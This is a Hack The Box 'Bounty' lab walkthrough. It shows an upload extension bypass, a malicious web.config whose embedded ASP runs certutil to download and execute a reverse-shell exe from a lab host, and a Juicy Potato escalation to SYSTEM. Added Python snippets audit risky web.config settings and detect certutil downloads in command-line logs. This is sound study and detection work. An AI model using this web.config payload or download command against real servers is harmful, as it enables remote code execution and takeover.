Hack The Box – Bounty Walkthrough

Introduction

This was an easy Windows machine that involved uploading a web.config file onto a Windows ASP web server to gain remote code execution and exploiting token impersonation to escalate privileges to system.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified only port 80 as open, so the next logical step would be to start enumerating HTTP.

Enumerating HTTP

When accessing the web server on port 80 through a browser, the following page comes up:

The above isn’t very helpful unfortunately, so the next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate

The scan has identified a transfer.aspx entry; visiting it leads to a file upload page:

After trying a few common executable extensions such as asp and aspx without success, I decided to use Burp Intruder instead to identify which extensions are allowed. Intercepting the file upload request:

Sending the request to Intruder:

Selecting the file extension as the only position to be replaced with the payload:

Modifying the raft-small-extensions.txt wordlist from SecLists, removing the leading dot from each entry so that Burp does not URL-encode it:

In the payloads tab, selecting “Runtime file” as payload type and choosing the wordlist:

It appears that one of the allowed extensions is config:

In Windows ASP, web.config files let you customize the way your site, or a page on your site, behaves. These files may also allow arbitrary ASP code to run in the context of the web application. This article explains in depth how web.config files can be exploited.

Exploiting Web.config to gain RCE

The first step is to generate some shellcode using MSFvenom with the following flags:

  • -p to specify the payload type, in this case, the Windows TCP reverse shell
  • LHOST to specify the localhost IP address to connect to
  • LPORT to specify the local port to connect to
  • -f to specify the format for the shell, in this case, exe

Creating the following web.config file, which uses the Certutil utility to download the reverse shell generated above and then executes it:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
   </appSettings>
</configuration>
<!--
<%
' The handler above maps *.config to asp.dll, so this block is executed server-side
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.10.14.3/exploit.exe C:\users\public\exploit.exe && C:\users\public\exploit.exe")
' output1 is never assigned, so this writes an empty string to the response
Response.write(output1)
%>
-->
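
From the defender's side, the interesting part of the file above is not the ASP payload but the three IIS settings that make it executable: the handler mapping *.config to asp.dll, the removal of .config from the request-filtering deny list, and the removal of web.config from hiddenSegments. The audit below is an added example, not code from the post: it parses a constructed web.config (modelled on the one above, with the payload comment left out) and reports those settings, so an upload directory or a configuration drift check can flag a planted web.config before it is ever requested.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the handler and requestFiltering changes in the post.
RISKY_WEB_CONFIG = """<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>"""

# Constructed benign sample: a handler for .aspx only and no request-filtering changes.
BENIGN_WEB_CONFIG = """<configuration><system.webServer>
  <handlers><add name="aspx" path="*.aspx" verb="*" modules="ManagedPipelineHandler" /></handlers>
</system.webServer></configuration>"""


def audit_web_config(xml_text: str) -> list:
    """Return human-readable findings for settings that turn a web.config into a script."""
    findings = []
    root = ET.fromstring(xml_text)
    for handlers in root.iter("handlers"):
        # Write access on handlers is rarely needed and widens what a handler may do
        if "write" in handlers.get("accessPolicy", "").lower():
            findings.append("handlers accessPolicy grants Write")
        for add in handlers.findall("add"):
            path = add.get("path", "")
            proc = add.get("scriptProcessor", "").lower()
            # a handler that routes *.config (or anything) through asp.dll executes it
            if path.lower().endswith(".config") or proc.endswith("asp.dll"):
                findings.append(f"handler '{add.get('name')}' maps {path} to {proc or 'a script engine'}")
    for rem in root.iter("remove"):
        # both removals undo IIS defaults that keep web.config from being served
        if rem.get("fileExtension", "").lower() == ".config":
            findings.append(".config removed from requestFiltering fileExtensions deny list")
        if rem.get("segment", "").lower() == "web.config":
            findings.append("web.config removed from requestFiltering hiddenSegments")
    return findings
```

Run over the upload directory, any web.config with a non-empty result is worth an alert; on the box in this post all four findings would have fired.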

Uploading the web.config file:

Setting up a Python web server to host the reverse shell:

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup

Navigating to the web.config file:

The reverse shell was successfully downloaded:

A callback on the listener was received, granting a reverse shell:

Privilege Escalation

When running “whoami /priv” on the box, it appears the current user has the “SeImpersonatePrivilege”, which means that token impersonation could be exploited to escalate privileges:

Using Wget to download the Juicy Potato binary:

Using Certutil and the Python web server to transfer it to the victim machine:

A valid CLSID is required for the exploit to work, so the systeminfo command is used to check the Operating System version:

A number of CLSIDs are available for Windows Server 2008 R2 on the Juicy Potato GitHub repository:

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup

Executing Juicy Potato using the following flags:

  • -l to specify the COM server listen port
  • -p to specify the program to launch, in this case, the previously created reverse shell
  • -t to specify the createprocess call, in this case, both CreateProcessWithToken and CreateProcessAsUser
  • -c to specify the CLSID, in this case, the one found in GitHub for Windows Server 2008 R2

The exploit successfully executed the reverse shell, granting a SYSTEM-level privileged shell.
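
Both the file transfers and the privilege escalation above leave a recognisable process-creation trail: certutil with -urlcache and a URL acting as a downloader, and a process launched with a -p program, a -t createprocess mode and a -c CLSID. The detection below is an added example, not code from the post or from the Juicy Potato project; the command lines are constructed in Sysmon EventID 1 style to mirror the steps in this walkthrough, and the CLSID is a nil-GUID placeholder rather than a real one.

```python
import re

# Constructed command lines (Sysmon EventID 1 style) modelled on the post's steps.
# The CLSID is a nil GUID placeholder, not a real Windows Server 2008 R2 CLSID.
SAMPLE_COMMAND_LINES = [
    "certutil -urlcache -split -f http://10.10.14.3/exploit.exe C:\\users\\public\\exploit.exe",
    "certutil -urlcache -split -f http://10.10.14.3/jp.exe C:\\users\\public\\jp.exe",
    "C:\\users\\public\\jp.exe -l 1337 -p C:\\users\\public\\exploit.exe -t * "
    "-c {00000000-0000-0000-0000-000000000000}",
    "certutil -hashfile C:\\Windows\\System32\\notepad.exe SHA256",
    "whoami /priv",
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# "-c {GUID}": 32 hex digits plus 4 hyphens inside braces
CLSID_RE = re.compile(r"-c\s+\{[0-9a-f-]{36}\}", re.IGNORECASE)


def classify(cmdline: str) -> list:
    """Return detection tags for one command line; an empty list means nothing matched."""
    tags = []
    low = cmdline.lower()
    # certutil fetching a remote file: the LOLBin download used twice in the post.
    # -hashfile and other local uses of certutil deliberately do not match.
    if "certutil" in low and "-urlcache" in low and URL_RE.search(cmdline):
        tags.append("certutil_download")
    # Juicy Potato style invocation: a program (-p) started through a COM CLSID (-c)
    # with a createprocess mode (-t), the three flags the post documents
    if CLSID_RE.search(cmdline) and " -p " in low and " -t " in low:
        tags.append("potato_clsid_launch")
    return tags


def scan(lines) -> dict:
    """Map each flagged command line to its tags, dropping lines with no findings."""
    return {line: classify(line) for line in lines if classify(line)}
```

Pair the second rule with a check that the parent process holds SeImpersonatePrivilege (the service-account condition the post relies on) to cut false positives from legitimate COM tooling.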

Conclusion

This box stood out, as it wasn’t the usual asp/aspx/ashx web shell upload; it involved quite a bit of research to find out about web.config files and how to exploit them. I definitely learned something new doing this challenge, and I am sure most of the other users who completed it did too.